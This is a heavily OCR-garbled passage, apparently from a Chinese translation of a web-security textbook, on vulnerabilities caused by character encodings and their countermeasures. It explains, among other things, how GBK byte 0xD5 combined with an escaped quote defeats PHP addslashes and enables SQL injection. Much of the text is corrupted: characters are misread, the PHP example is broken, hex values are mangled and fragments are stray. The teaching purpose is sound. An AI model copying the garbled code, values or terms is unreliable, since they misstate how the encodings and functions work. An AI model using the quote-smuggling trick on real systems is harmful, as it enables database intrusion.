PHP5.2 分 支 中 ， 官 方 已 经 宣布 最 终 支持 的 版 本 为 52.17 了 ， 所 以 强烈 推荐 升级 到 5.3 以 后 的 新 版 本 。 


































































































人 GB2312 
GB2312 中 对 所 收录 的 汉字 进行 了 “分 区 ”处 理 ， 每 区 含有 94 个 汉字 / 符号 ， 这 种 表示 方式 
也 称 为 区 位 码 。 具 体 分 区 情况 如 下 。 
01 一 09 区 为 符号 和 数字 
16 一 55 区 为 一 级 汉字 ， 按 拼音 排序 
56 一 87 区 为 二 级 汉字 ， 按 部 首 / 笔画 排序 
88 一 94 区 为 有 待 进一步 标准 化 的 空白 区 


在 GB2312 编码 中 ， 每 个 汉字 及 符号 使 用 两 个 字 节 来 表示 。 其 中 第 一 个 字 节 称 为 “高 位 字 
节 ”， 第 二 个 字 节 称 为 “低位 字 节 ”。 

高 位 字 节 的 编码 范围 为 0xA1~0xF7 (将 01~87 区 的 区 号 加 上 0xA0 )， 低 位 字 节 则 使 用 了 
0xA1~0xFE。 由 于 一 级 汉字 从 16 区 起 始 ， 因 此 汉字 区 的 高 位 字 节 的 范围 是 0xB0~0xF7， 低 位 
字 节 的 范围 是 0xAl1~0xFE。 

以 “ 安 ” 字 为 例 ， 它 在 GB2312 字符 集中 的 区 位 码 为 1618， 分别 加 上 0xAl 后 ， 就 可 以 得 到 























QD ”如果 系统 不 允许 有 5 字 节 以 上 形式 存在 的 话 ， 为 了 检查 可 以 先 将 数据 转换 为 UTF-16 后 再 转换 回 UTF-8， 如 果 经 过 两 
次 转换 后 数据 仍 和 原 数 据 相 同 的 话 ， 就 可 以 认为 是 正确 的 编码 数据 。 
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它 在 GB2312 中 的 编码 为 0xB0B2 (0xB0 = 0xA1+ 16，0xB2 = 0xAl1+18)。 


人 对 字符 匹配 的 影响 
GB2312 编码 也 存在 和 EUC-JP 类 似 的 问题 ， 即 它 的 第 一 个 字 节 和 第 二 个 字 节 的 范围 是 互相 
重 琶 的。 我们 也 可 以 参考 上 面 的 例子 ， 编 写 如 下 测试 代码 。 








J 

















<?php 

mb internal encoding ("GB2312"); 
$pl = strpos(" 安 炒 "，' 渤 '); 

/A Tn (1) 


var dump ($p1); 


$p2 = mb_strpos(" 安 炒 "，'! 渤 '); 
// bool (false) 
var_ dump ($p2); 











汉字 “ 安 ” 的 区 位 码 为 1618,“ 渤 ”为 1819， 而 “ 炒 ” 为 1920,“ 安 炒 ” 连 起 来 为 16181920， 
如 果 忽 略 双 字 节 编 码 因素 ， 就 会 导致 1819 被 单独 拿 出 来 并 被 匹配 为 “ 渤 ” 字 。 

使 用 GB2312 编码 格式 保存 此 文件 并 执行 的 话 ， 将 分 别 输出 int (1) 和 bool (false)。 

在 GB2312 中 解决 这 个 问题 的 方法 和 EUC-JP 等 类 似 ， 可 以 在 设置 内 部 编码 为 GB2312 之 后 ， 
使 用 mpb_strpos 等 支持 多 字 节 字 版 本 的 字符 串 函 数 。 


2 非法 GB23122 编码 数据 
这 也 和 Shift_ JIS 类 似 ， 请 各 位 读者 参考 前 面 章 节 中 的 说 明 。 


令 GBK 
GBK 字符 有 单字 节 和 双 字 节 编 码 。 单 字 节 编码 范围 为 0x00 一 0x7F， 这 是 和 ASCII 保持 一 
致 的 。 
在 双 字 节 编 码 中 ，GBK 的 第 一 字 节 的 取 值 范围 为 0x81~0xFE， 第 二 字 节 的 一 部 分 
为 0x40~0x7E， 另 一 部 分 为 0x80~0xFE。 也 就 是 说 它 的 码 位 空间 为 0x8140~~0xFE7E 和 
Ox8180~0xFEFE,。 
9 码 位 范围 导致 的 问题 
从 上 面 GBK 编码 中 两 个 字 节 的 取 值 范围 可 以 看 出 它 存在 如 下 两 个 问题 。 
前 置 字 节 和 后 置 字 节 的 取 值 范围 部 分 重复 
第 二 字 节 可 能 包含 字符 0x5C 
第 一 个 问题 和 前 面 提 到 的 GB2312 类 似 ， 这 里 就 不 详细 说 明了 。 而 第 二 个 问题 则 更 为 严重 ， 
PHP 就 曾经 出 现 过 一 个 和 此 相关 的 非常 严重 的 安全 漏洞 。 
这 个 漏洞 发 生 在 PHP 中 的 addslashes 函数 中 。 该 函数 的 作用 是 使 用 反 和 斜 线 对 字符 串 中 的 




































































6.3 ”字符 编码 方式 | 331 


特殊 字符 进行 转 义 ， 这 些 字符 为 单 引号 (' )、 双 引号 (") 反 和 斜 线 (\) 和 NUL (NULL 字符 )。 

该 漏洞 发 后 的 根本 原因 是 addslashes 函数 并 未 考虑 字符 编码 的 问题 ， 而 \ 的 ASCII 码 是 
0x5C， 正 好 落 在 GBK 扩充 集 的 低 字 节 范围 内 。 假 设 用户 输 入 了 字符 0xD527， 由 于 0x27 是 单 引 
号 ， 而 此 函数 又 不 关心 字符 编码 方式 ， 因 此 0xD527 会 被 转 义 为 0xD55C0x27。 而 0xD50x5C 又 
是 一 个 合法 的 GBK 汉字 (“ 诚 ” 字 )， 也 就 是 说 输入 变 成 了 诚 '， 从 而 导致 单 引号 被 保留 ， 进 而 被 






































用 于 SQL 注入 攻击 。 
要 想 避 免 此 问题 ， 最 根本 的 解决 办 法 就 是 统一 使 用 UTF-8 编码 。 
@ GB18030 





GB18030 是 多 字 节 字符 集 ， 它 的 字符 可 以 用 一 个 、 两 个 或 四 个 字 节 表示 。GB18030 编码 的 
各 字 节 分 配 情况 如 下 表 所 示 。 


表 6-5 GB18030 编码 的 各 字 节 分 配 情况 






































1 字 节 字符 Ox00~0x7F 
2 字 节 字符 第 1 字 节 第 2 字 节 
0x40~0x7E 
Ox81~0xFE 
Ox80~0OxFE 
4 字 节 字符 第 1 字 节 第 2 字 节 第 3 字 节 第 4 字 节 
Ox81~0xFE 0x30 一 0x39 0x81~0xFE 0x30 一 0x39 














单字 节 部 分 使 用 了 0x00 一 0x7F 编码 ( 对 应 于 ASCII 码 的 相应 码 )。 

双 字 节 部 分 前 置 字 节 码 位 为 0x8l~0xFE， 后 置 字 节 码 位 分 别 是 0x40~0x7E 和 
0x80~0xFE。 

四 字 节 部 分 采用 GB/T 11383 未 采用 的 0x30 一 0x39 作为 对 双 字 节 编 码 扩 充 的 后 级 ， 这 样 
扩充 的 四 字 节 编码 ， 其 范围 为 0x81308130~~0xFE39FE39。 其 中 第 一 、 三 个 字 节 编码 码 位 均 为 
0x81 一 0xFE， 第 二 、 四 个 字 节 编码 码 位 均 为 0x30 一 0x39。 

从 GB18030 编码 的 字 节 分 配 情况 来 看 ， 虽 然 它 的 一 部 分 字 节 包含 0x30 一 0x39 的 取 值 范围 ， 
这 和 ASCII 的 可 见 部 分 重合 ,不 过 ASCII 中 的 该 部 分 字符 为 阿拉 伯 数 字 0 一 9， 因 此 并 不 会 导致 
5C 问题 的 发 生 。 唯 一 可 能 存在 问题 的 地 方 是 在 四 字 节 编码 的 文字 中 ， 前 两 个 字 节 和 后 两 个 字 节 
的 取 值 范围 是 重合 的 ， 这 可 能 会 导致 前 面 所 说 的 字符 串 匹 配 问题 。 
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6.4 由 字符 编码 引起 的 漏洞 总 结 


前 面 我 们 一 边 介绍 字符 编码 的 基本 知识 ， 一 边 对 因 字 符 编码 引发 的 系统 漏洞 的 发 生 原因 进行 
了 比较 详细 的 说 明 。 总 结 一 下 ， 我 们 可 以 把 因 字 符 编 码 导 致 的 系统 漏洞 归结 为 以 下 3 种 类 型 。 


字符 编码 方式 中 非法 数据 导致 的 漏洞 
对 字符 编码 方式 处 理 存在 丝 漏 导致 的 漏洞 
在 不 同 字符 集 之 间 变 换 导 致 的 漏洞 


人 字符 编码 方式 中 非法 数据 导致 的 漏洞 

字符 编码 方式 中 非法 数据 的 典型 例子 是 只 有 前 置 字 节 的 半 个 字符 ， 以 及 UTF-8 里 的 非 最 短 
形式 数据 。 只 有 前 置 字 节 的 半 个 字符 引起 的 XSS 漏洞 如 同 我 们 前 面 介绍 过 的 那样 。UTF-8 的 非 
最 短 形式 数据 导致 的 漏洞 的 话 ， 比 较 有 名 的 包括 IIS MS00-057? 和 Tomcat 的 目录 遍历 漏洞 CVE- 
2008-29382 等 8。2001 年 肆虐 一 时 的 Nimda 蠕虫 病 毒 正 是 利用 了 MS00-057 漏洞 的 典型 代表 。 


令 对 字符 编码 方式 处 理 存在 丝 漏 导致 的 漏洞 

在 处 理 字符 编码 的 时 候 ， 容 易 发 生 的 Bug 有 很 多 ， 典 型 的 例子 如 我 们 在 前 面 讲述 的 “5C” 
问题 。 除 日 本 外 尤其 是 使 用 单字 节 编 码 语言 的 地 域 开 发 的 软件 可 能 存在 着 对 多 字 节 字符 的 处 理 遗 
漏 或 者 欠缺 的 情况 ， 这 就 有 可 能 导致 “5C” 等 漏洞 问题 的 发 生 。 另 外 ， 本 书 里 没有 介绍 的 UTF-7 
字符 编码 方式 ， 也 有 针对 这 种 编码 方式 的 XSS 攻击 方法 ， 同 样 也 属于 对 字符 编码 方式 处 理 欠 缺 
导致 的 漏洞 。 




























































































人 在 不 同 字符 集 间 变 换 导 致 的 漏洞 

在 将 Unicode 的 日 元 符号 “三 ”(U+00A5 ) 转换 为 其 他 字符 集 ( 比如 微软 标准 字符 集 ) 的 时 
候 ， 根 据 处 理 方法 不 同 有 可 能 会 将 其 转换 为 反 斜 线 “\”， 这 也 是 不 同 的 字符 集 之 间 的 变换 导致 
的 漏洞 。 在 4.4 节 里 介绍 过 的 JVN#59748723® 也 是 由 这 种 原因 引起 的 问题 。 

到 目前 为 止 ， 我 们 已 经 对 字符 编码 处 理 中 常见 的 引发 系统 漏洞 的 原因 进行 了 说 明 ， 从 下 一 节 
开始 我 们 将 讲述 一 下 如 何 正确 处 理 字符 编码 。 






































http://technet.microsoft.com/en-us/security/bulletin/ms00-057 
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2938 
Tomcat Security Team 认为 这 并 不 是 Tomcat 的 问题 而 是 JRE 的 问题 。 
http:/Vjvn.jp/jp/JVN59748723/index.html 
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要 想 正确 地 处 理 字 符 编 码 问题 ,需要 遵循 下 面 4 条 要 求 。 


在 应 用 内 使 用 统一 的 字符 集 
输入 非法 数据 时 报错 并 终止 处 理 
处 理 数 据 时 使 用 正确 的 编码 方式 
输出 时 设置 正确 的 字符 编码 方式 
如 果 把 这 4 项 整理 到 一 起 的 话 ， 如 图 6-20 所 示 。 
图 6-20 ”正确 处 理 字符 编码 的 要 点 













































































输入 处 理 输出 
显示 /HTML 浏览 
* 选择 能 支持 日 语 
浏览 令 查 的 函数 正确 设置 字符 
刘 览 检查 DB/SOL 正确 设置 字符 
人 字符 编码 “| ' 正确 设置 字符 编 编码 方式 
码 方式 
邮件 
ns 区 J 
统一 字符 集 





下 面 开始 分 别 对 这 儿 项 进行 详细 说 明 。 


令 在 应 用 内 使 用 统一 的 字符 集 

即使 抛 开 安全 性 来 说 ， 也 应 该 在 全 系统 内 统一 所 使 用 的 字符 集 。 如 果 系 统 中 存在 不 同 的 字符 
对， 是 要 转换 的 目标 字符 集 不 存在 原 字符 集 的 字符 的 话 ， 就 会 出 现 乱 码 问题 。 

现在 的 0S 、 编 程 语 言 、 数 据 库 等 系统 软件 都 能 够 支持 Unicode， 所 以 可 以 说 如 果 Web 应 用 
也 都 统一 使 用 Unicode 的 话 将 是 最 安全 的 。 



































O 不 能 统一 使 用 Unicode 的 事例 
如 果 将 应 用 系统 的 字符 集 统一 成 Unicode 的 话 ， 那 么 在 不 支持 Unicode 的 设备 上 就 会 出 现 问 
题 。 典 型 的 例子 有 下 面 两 个 。 
手机 浏览 器 
电子 邮件 
由 于 大 多 数 手机 浏览 器 中 只 支持 Shift_JIS 编码 方式 了， 发 送 邮 件 的 时 候 字符 编码 主流 也 是 






































QD ”此 处 手机 指 的 是 功能 机 。 现 在 的 智能 机 上 的 浏览 器 几乎 都 支持 Unicode。 译 者 注 
@ 最 近 虽 说 有 一 些 手 机 浏览 器 已 经 开始 支持 UTF-8 编码 了 ， 但 是 2010 年 12 月 以 前 au/KDDI 的 主页 上 明确 要 求 使 用 
Shift JIS 编码 ， 不 能 使 用 UTF-8。 
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ISO-2022- 卫 ， 所 以 这 两 种 情况 都 很 难 统一 使 用 Unicode 字符 编码 方式 。 


人 面向 手机 Web 应 用 中 字符 编码 的 处 理 方法 
面向 手机 的 Web 应 用 程序 中 ， 典 型 的 处 理 字符 编码 的 6-21 面向 手机 Web 应 用 的 字 
方法 一 般 如 图 6-21， 在 应 用 程序 的 外 部 (HTTP 消息 ) 使 用 符 编码 设置 








Shfit_JIS 编码 方式 ， 在 应 用 内 部 使 用 UTF-8 或 者 UTF-16, 在 
输入 输出 时 在 两 种 编码 方式 之 间 相 互 转换 。 

输入 的 时 候 从 Shfit JIS 转换 为 UTF-8 没什么 问题 。 在 编 
码 转换 后 ， 会 使 用 变换 后 的 数据 进行 输入 值 检查 、 转 义 等 处 








理 ， 假 如 这 时 候 即 使 发 生 乱 码 的 问题 
后 的 数据 进行 转 义 等 进行 数据 复原 。 





但 是 ， 输 出 时 从 UTF-8 转换 为 Shift JIS 的 时 候 ， 有 可 能 UTF-8 一 Shift JIS 





， 之 后 也 还 会 使 用 乱码 输入 数据 检查 
































本 Shift_ JIS 




















Shift JIS 一"UTF-8 





各 种 各 样 的 处 理 
转 义 UTF-8 




















出 现 日 元 符号 (U+00A5 ) 变 成 反 斜 线 (0x5C ) 的 问题 。 输 出 


时 进行 编码 转换 之 所 以 会 发 生 问题 ， 如 图 6-21 所 示 ， 是 因为 


在 进行 转 义 处 理 后 字符 集 已 经 改变 了 
需要 进行 转 义 而 没有 进行 转 义 的 字符 。 

















= Shift_JIS 
， 编 码 转换 后 可 能 出 现 讲 








但 是 如 果 原 来 输入 的 数据 全 是 Shfit_ JIS 编码 格式 的 话 ， 因 为 不 会 输入 Shfit_ JIS 编码 里 不 存 


在 的 字符 ， 所 以 不 会 发 生 任何 问题 "。 














另 一 方面 ， 如 果 数 据 库 里 保存 的 是 类 似 U+00A5 这 样 Unicode 的 固有 的 字符 的 话 ， 可 以 预 
先进 行 一 遍 UTF-8 一 Shift_JIS 一 UTF-8 的 编码 转换 过 程 。 笔 者 把 这 种 方法 叫 作 “字符 集 降 级 处 























理 ”。 通 过 字符 集 降级 处 理 让 可 能 出 现 的 乱码 的 问题 提 


图 6-22 字符 集 降级 处 理 


前 出 现 ， 在 此 基础 上 再 进行 转 义 等 处 理 ， 就 可 以 防止 由 


于 字符 集 转换 导致 的 各 种 问题 的 发 生 。 


种 处 理 的 大 概 流 程 ， 图 中 的 处理 顺序 很 重要 。 如 果 在 对 
输入 进行 转 义 处 理 之 前 不 先 做 字符 集 降级 处 理 的 话 ， 就 


有 可 能 导致 系统 出 现 漏洞 。 
9 电子 邮件 中 字符 编码 的 处 理 方法 























es ¥ U+00A5 
图 6-22 显示 了 这 UTF-8 A U+00C2 
得 到 输入 数据 
字符 集 降级 处 理 | UTF-8 一 Shift_JIS 一 UTF-8 
各 种 处 理 U+00A5 一 0x005C 转换 完成 
转 义 














长 时 间 以 来 ， 日 语 邮件 中 的 字符 编码 几乎 都 是 ISO- | UTF.8_Shift_ JIS | 不 会 出 现 多 对 一 的 变换 
2022-JP。 但 是 最 近 能 处 理 UTF-8 编码 的 邮件 客户 端正 在 





增加 9。 


在 应 用 程序 内 部 使 用 Unicode 编码 ， 在 发 送 邮 件 的 
时 候 进 行 ISO-2022-JP 编码 转换 ， 如 果 邮 件 中 存在 ISO- 








四 输入 字符 编码 自动 选择 的 时 候 则 存在 混入 











Shift_JIS 
:| ¥ Ox5C 
| A Ox41 














+00A5 等 Shift_JIS 中 不 存在 的 字符 的 风险 。 


@@ 手机 上 的 邮件 客户 端 也 能 处 理 UTF-8 编码 的 邮件 了 。 据 说 这 是 为 了 支持 iPhone 的 邮件 客户 端 在 特定 的 条 件 下 发 送 的 


UTF-8 编码 的 邮件 。 
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2022-JP 不 支持 的 字符 的 话 ， 就 会 出 现 乱 码 。 但 是 在 笔者 的 调查 中 ， 这 并 不 会 导致 系统 在 安全 上 
出 现 什 么 漏洞 。 其 原因 在 于 如 果 在 邮件 处 理 ( MIME 编码 等 ) 开始 之 前 进行 ISO-2022-JP 编码 ， 
和 邮件 处 理 中 必须 要 注意 的 可 能 在 安全 上 出 问题 的 回 车 换行 等 字符 ， 在 任何 字符 编码 里 都 是 共 
通 的 。 

所 以 在 收发 电子 邮件 的 时 候 ， 可 以 认为 不 会 发 生 由 字符 编码 导致 的 安全 漏洞 。 


令 输入 非法 数据 时 报错 并 终止 处 理 

如 同 4.2 节 里 讲 到 的 那样 ， 在 进行 输入 检查 的 时 候 如 果 发 现 了 输入 字符 中 存在 非法 编码 数据 
的 话 ， 就 立即 报错 并 终止 继续 处 理 是 一 个 比较 好 的 处 理 方法 。 我 们 可 以 认为 字符 编码 数据 的 正确 
性 是 应 用 程序 正常 运行 的 基本 前 提 。 

在 现代 Web 程序 开发 用 的 高 级 语言 中 ,Java 和 ASPNET ( C# 或 者 VB.NET ) 会 对 输入 
数据 进行 字符 编码 的 变换 ， 在 这 个 过 程 中 如 果 发 现 了 非法 的 编码 数据 的 话 ， 会 用 替换 字符 
(Replacement Character、U+FFFD ) 来 蔡 换 非法 字符 。 

Perl (版 本 5.8 以 上 ) 的 话 ， 可 以 通过 调用 decode 来 实现 类 似 的 功能 ， 在 将 数据 转换 为 内 部 
形式 时 进行 非法 字符 编码 数据 的 替换 工作 。 

PHP 的 话 则 没有 这 种 非法 字符 编码 数据 自动 蔡 换 功能 ， 但 是 我 们 可 以 像 4.2 节 里 讲 的 那样 ， 
可 以 调用 mb_check encoding 来 检查 输入 数据 的 字符 编码 。 


令 处 理 数据 时 使 用 正确 的 编码 方式 
要 想 正确 的 进行 字符 编码 处 理 ， 需 要 遵循 下 面 的 原则 。 


只 使 用 对 应 多 字 节 字符 的 函数 和 实现 
在 函数 的 参数 中 明确 设置 编码 方式 


下 面 分 别 说 明 这 两 个 原则 。 
















































































OO 只 使 用 对 应 多 字 节 字符 的 函数 和 实现 

为 了 正确 地 进行 字符 编码 操作 ， 需 要 使 用 多 字 节 版 本 的 实现 及 函数 。Java、.NET、Perl (版 
本 5.8 或 更 新 ) 的 话 没 有 特别 需要 注意 的 ， 但 是 PHP 从 语言 本 身 的 话 并 没有 支持 多 字 节 字符 ， 所 
以 需要 遵循 下 面 的 要 求 。 


源 代码 需要 用 UTF-8( 推荐 ) 或 者 EUC-JP 的 编码 方式 保存 

将 配置 文件 php.ini 的 mbstring.internal_ encoding 设置 为 与 源 代 码 文件 的 编码 一 臻 

原则 上 所 有 字符 串 操 作 都 是 用 mbstring 系列 版 本 的 函数 (即使 不 太 可 能 出 现 非 英语 字符 的 
时 候 也 一 样 遵循 此 原则 ) 





















































9 在 函数 的 参数 中 明确 设置 编码 方式 
这 个 原则 主要 也 是 在 使 用 PHP 时 需要 注意 的 。 在 调用 mbstring 系列 的 函数 时 如 果 不 显 式 
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指定 编码 方式 的 话 ， 会 使 用 php.ini 文件 里 设置 的 mbstring.internal encoding 值 进行 处 理 。 但 是 
像 htmlspecialchars 这 样 的 函数 则 不 会 使 用 mbstring.internal_encoding 作为 默认 值 进行 处 理 ， 
需要 调用 的 时 候 手工 设置 字符 编码 方式 。 








专栏 : 调用 htmlspecialchars 函数 时 必须 指定 字符 编码 方式 COLUMN 


直 以 来 很 多 PHP 的 入 门 书籍 都 宣称 在 使 用 htmlspecialchars 时 可 以 不 用 指定 字符 编 
码 方式 ， 其 实 这 种 认识 是 错误 的 。 老 版 本 的 htmlspecialchars 函数 在 字符 编码 方面 的 检查 
不 是 非常 充分 ， 这 种 说 法 只 不 过 是 一 种 广泛 传播 的 误解 。 最 新 版 本 的 htmlspecialchars 函 
数 已 经 加 强 了 字符 编码 方面 的 检查 ， 通 过 指定 字符 编码 ， 可 以 使 系统 的 安全 性 更 上 一 层 。 









































输出 时 设置 正确 的 字符 编码 方式 
在 下 面 儿 种 情况 下 ， 需 要 在 输出 时 手工 进行 编码 方式 设置 。 


正确 设置 HTTP 返回 头 的 Content-Type 里 的 编码 方式 (请 参考 4.3 节 ) 
正确 设置 数据 库 的 字符 编码 方式 (请 参考 4.4 节 ) 
在 所 有 需要 设置 字符 编码 方式 的 地 方 设置 编码 方式 


下 面 分 别 对 这 几 项 进行 说 明 。 











O 正确 设置 HTTP 返回 头 的 Content-Type 里 的 编码 方式 
虽然 本 书 里 没有 涉及 此 部 分 内 容 ， 但 是 如 果 在 HTTP 返回 头 中 的 Content-Type 里 设置 一 个 
不 正确 的 编码 方式 的 话 ， 就 可 能 发 生 浏览 带 将 文件 内 容 误 认为 UTF-7 编码 进行 解析 ， 从 而 出 现 
XSS 漏洞 的 风险 。 这 里 所 说 的 “正确 设置 "， 是 指 设置 一 个 浏览 器 能 理解 的 字符 编码 方式 的 意思 。 
如 果 是 处 理 日 语 的 话 了, 那么 编码 方式 应 该 是 下 面 三 种 方式 之 一 。 注意 下 面 的 编码 方式 中 下 划 线 和 
中 划 线 的 区 别 。 
UTF-8 (推荐 ) 


Shift_JIS ( 只 用 在 面向 手机 的 Web 网 站 的 情况 下 ) 
EUC-JP 





























O 正确 设置 数据 库 的 字符 编码 方式 
数据 库 的 字符 编码 方式 设置 也 会 给 系统 安全 性 带 来 影响 。 在 数据 库 中 有 下 面 儿 个 地 方 可 以 进 
行 编码 方式 的 设置 (根据 数据 库 不 同 设置 场所 也 不 同 )。 


保存 时 的 编码 方式 (可 以 以 列 、 表 、 数 据 库 为 单位 进行 设置 
数据 库 内 处 理 时 使 用 的 编码 方式 














— 














中 ”中文 一 般 使 用 的 编码 方式 为 : UTF-8、GB2312 和 GBK。 译 者 注 
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连接 到 数据 库 引 擎 时 使 用 的 编码 方式 
不 管 在 哪里 进行 设置 ， 都 推荐 统一 使 用 Unicode 的 编码 方式 ， 即 UTF-8 或 者 UTF-16。 





/ 

















OO 通过 “ 尾 骨 骨 测试 ”来 确认 数据 库 编 码 方式 是 否 正常 工作 

下 面 简单 介绍 下 如 何 确认 整个 数据 库 是 否 正确 的 设置 为 了 Unicode 编码 了 ， 这 就 是 将 “ 尾 贱 
骨 ” 三 个 字 录 入 数据 库 ， 然 后 在 页 面 上 确认 这 几 个 字 是 否 能 正常 显示 出 来 。 如 果 “ 尾 姐 骨 ”能 正 
常 显示 的 话 ， 那 么 就 说 明 数 据 库 中 的 Unicode 设置 能 正常 工作 。 如 果 显 示 出 来 的 是 “ 尾 = 骨 ”或 
者 “ 尾 骨 ” 的 话 ， 那 么 就 要 怀疑 是 不 是 处 理 的 哪 一 环节 中 出 现 Shift_JIS 或 者 EUC-JP 了 。 笔 者 
将 这 种 测试 方法 叫 作 “ 尾 骨 骨 测试 ”。 

“ 尾 骨 骨 ”中 的 “ 髓 ” 字 ( U+9AB6 ) 是 JIS X 0208 中 不 存在 的 汉字 (JIS 第 3 基准 汉字 )， 所 
以 这 个 词汇 非常 适合 做 数据 库 编 码 设置 检查 的 测试 用 例 。 









































O 在 所 有 需要 设置 字符 编码 方式 的 地 方 设置 编码 方式 

根据 应 用 程序 中 所 使 用 的 编程 语言 或 者 第 三 方 库 的 不 同 ， 可 能 在 文件 读 写 、 邮 件 发 送 等 时 候 
都 能 够 手工 设置 编码 方式 。 这 时 候 需要 对 所 有 的 可 以 设置 字符 编码 方式 的 地 方 都 要 进行 确认 ， 根 
据 实际 情况 设置 正确 的 编码 方式 。 














令 其 他 对 策 : 尽量 避免 编码 自动 检测 
根据 所 使 用 编程 语言 的 不 同 ， 有 的 语言 能 支持 对 HTTP 请 求 的 编码 方式 进行 自动 判断 功能 
(PHP、Java、Perl 等 )， 但 是 基于 以 下 原因 ， 不 建议 使 用 字符 编码 自动 检测 功能 。 


在 只 考虑 到 Shfit_JIS 的 应 用 程序 中 ， 如 果 输 入 数据 中 混 有 Unicode 的 U+00A5 的 话 ， 则 
在 经 过 转 义 处 理 后 再 转换 为 Shfit JIS 编码 的 话 ， 有 可 能 U+00A5 会 被 错误 转换 为 0x5C 
〈 反 和 斜 线 )， 导 致 发 生 系统 漏洞 。 
如 果 字 符 编 码 方式 自动 检测 存在 缺陷 的 话 会 导致 判断 结果 不 正确 ， 从 而 发 生 乱 码 等 
现象 。 
所 以 要 尽量 避免 使 用 输入 数据 的 自动 编码 检测 功能 ， 而 是 通过 手工 显 式 地 进行 编码 方式 
设置 。 



























































中 ”此 测试 不 适用 于 中 文 。 中 文 的 乱码 问题 不 像 日 语 那么 复杂 。 一 一 译 者 注 
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6.6 总 结 


本 章 主要 讲述 了 字符 编码 的 处 理 对 安全 性 的 一 些 影响 。 
在 Web 应 用 程序 开发 时 经 常会 出 现 汉 字 乱 码 问题 ， 几 乎 每 个 人 都 曾经 遇 到 过 。 发 生 乱 码 的 
原因 都 是 因为 字符 编码 的 处 理 或 者 设置 不 正确 导致 的 。 字 符 编 码 除 了 会 导致 乱码 问题 外 ， 还 可 能 
会 引发 安全 漏洞 的 出 现 。 
像 这 样 由 于 字符 编码 处 理 不 当 导致 的 漏洞 绝对 不 是 什么 小 概率 事件 。 有 具体 到 如 何 去 做 ， 我 们 
可 以 从 最 常见 的 乱码 问题 开始 着 手 。 比 如 可 以 先 按照 下 面 的 步骤 进行 处 理 。 


发 现 非法 的 编码 数据 终止 处 理 ， 或 者 用 U+FFFD 替换 
确认 “ 表 ” 或 者 “>”“ 能 硅 ” 等 是 否 能 正确 保存 和 显示 
是 否 能 通过 尾 贱 骨 测 试 
由 字符 编码 引起 的 漏洞 经 党 被 用 在 网 络 攻击 中 ， 比 如 蠕虫 病毒 Nimda 就 是 利用 了 漏洞 
MS00-057 的 一 个 例子 。 
对 策 汇 总 
e 应 用 全 体 统一 使 用 Unicode 
e 输入 数据 非法 时 报错 并 终止 处 理 


。 处 理 数 据 时 使 用 正确 的 编码 方式 
。 输 出 时 设置 正确 的 字符 编码 方式 


















































如 何 提高 Web 网 站 
的 安全 性 


本 章 我 们 将 主要 探讨 一 下 除了 应 用 程序 以 外 ， 我 们 还 能 采 
取 哪 些 手 段 来 提高 网 站 整体 的 安全 性 。 首 先 ， 我 们 会 介绍 
一 下 Web 网 站 攻击 的 概况 ， 然 后 再 针对 各 种 攻击 手法 ， 对 
基础 软件 ( 中 间 件 ) 漏洞 、 伪 装 攻击 、 网 络 监听 、 网 络 算 改 ， 
以 及 恶意 软件 等 漏洞 或 攻击 行为 的 对 策 进行 说 明 。 
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在 进行 详细 介绍 之 前 ,我们 先 总 结 一 下 来 自 Web 网 站 外 部 的 攻击 都 有 哪些 ， 如 图 7-1 所 示 。 


7-1 针对 Web 网 站 的 外 部 攻击 


以 





托管 Web 网 站 的 数据 中 






























































正规 网 站 
针对 应 用 程序 的 攻击 
针对 PHP 的 攻击 
针对 Apache 的 攻击 
针对 FTP 的 密码 攻击 全 | 
利用 有 漏洞 的 服务 器 做 跳台 
进行 ARP 欺骗 攻击 ARP 欺骗 攻击 






































上 有 漏洞 的 
加 服务 器 
得 改正 规 网 站 的 


IP 地 址 


钓鱼 邮件 2 网 站 
员 诱导 用 户 输入 个 人 信息 


像 上 图 显示 的 那样 ， 除 了 应 用 程序 本 号 以 外 ,攻击 者 还 有 很 多 其 他 途径 可 以 发 动 攻击 ， 如 果 
不 预防 这 些 潜在 威胁 的 话 ， 光 靠 编写 安全 的 程序 是 不 能 100% 保证 Web 网 站 的 安全 性 的 。 本 章 
将 把 这 些 应 用 程序 以 外 的 攻击 分 为 以 下 几 类 ， 并 分 别 介 绍 针 对 这 些 攻击 可 以 采取 的 对 策 。 


针对 Web 服务 器 的 攻击 
伪装 攻击 
网 络 监听 、 网 络 算 改 


恶意 软件 
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7.1 针对 Web 服务 器 的 攻击 途径 和 防范 措施 





如 果 只 是 在 Web 应 用 程序 里 面 清 除了 潜在 安全 隐患 的 话 ， 并 不 足以 保证 系统 的 绝对 安全 性 。 
除了 应 用 程序 ， 还 要 确保 像 Web 服务 器 (包括 PHP 或 Servlet 容 避 等 中 间 件 ) 等 基础 软件 的 安全 
性 。 本 章 将 先 介绍 一 下 针对 Web 服务 需 的 攻击 手段 ， 然 后 再 阐述 如 何 对 其 进行 防御 。 





7.1.1 利用 基础 软件 漏洞 进行 攻击 


操作 系统 及 Web 服务 器 等 软件 也 会 存在 漏洞 ，Web 服务 器 有 可 能 因为 这 些 基础 软件 的 漏洞 导致 
被 入 侵 。 另 外 如 果 Web 服务 需 中 还 存在 跨 站 脚本 攻击 (XSS ) 漏洞 的 话 ， 则 有 可 能 导致 发 生 被 动 
攻击 从 而 进一步 对 用 户 造 成 侵害 。 

利用 了 基础 软件 漏洞 的 攻击 会 导致 各 种 次 生 灾害 发 生 ， 比 如 网 站 被 算 改 、 信 息 汇 露 、 拒 绝 服 
务 ， 或 者 被 用 来 当 作 跳板 进而 发 动 对 其 他 服务 需 的 攻击 等 。 














7.1.2 非法 登录 


网 络 上 有 很 多 针对 管理 Web 服务 顺 用 的 软件 (Telnet、FTP、SSH 等 服务 器 软 件 ， 以 及 
phpMyAdmin 或 者 Tomcat 的 管理 页 面 ) 密码 进行 暴力 破解 的 攻击 。 攻 击 者 事 会 先 对 服务 需 进 行 
端口 扫描 来 确认 哪些 端口 或 是 服务 是 开放 的 ， 然 后 针对 开放 的 端口 或 者 服务 进行 基于 字典 的 暴力 
破解 攻击 。 

如 果 管 理 服务 器 用 的 密码 被 破解 的 话 ， 会 造成 网 站 内 容 被 算 改 或 信息 泄露 等 各 种 重大 问题 。 






































7.1.3 ”对策 
为 了 预防 针对 Web 服务 器 的 攻击 ， 可 以 采取 以 下 的 对 策 。 


停止 运行 不 需要 的 软件 

定期 实施 漏洞 防范 措施 

对 不 需要 对 外 公开 的 端口 或 者 服务 加 以 访问 限制 
提高 认证 强度 


下 面 分 别 对 这 几 项 加 以 说 明 。 
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停止 运行 不 需要 的 软件 

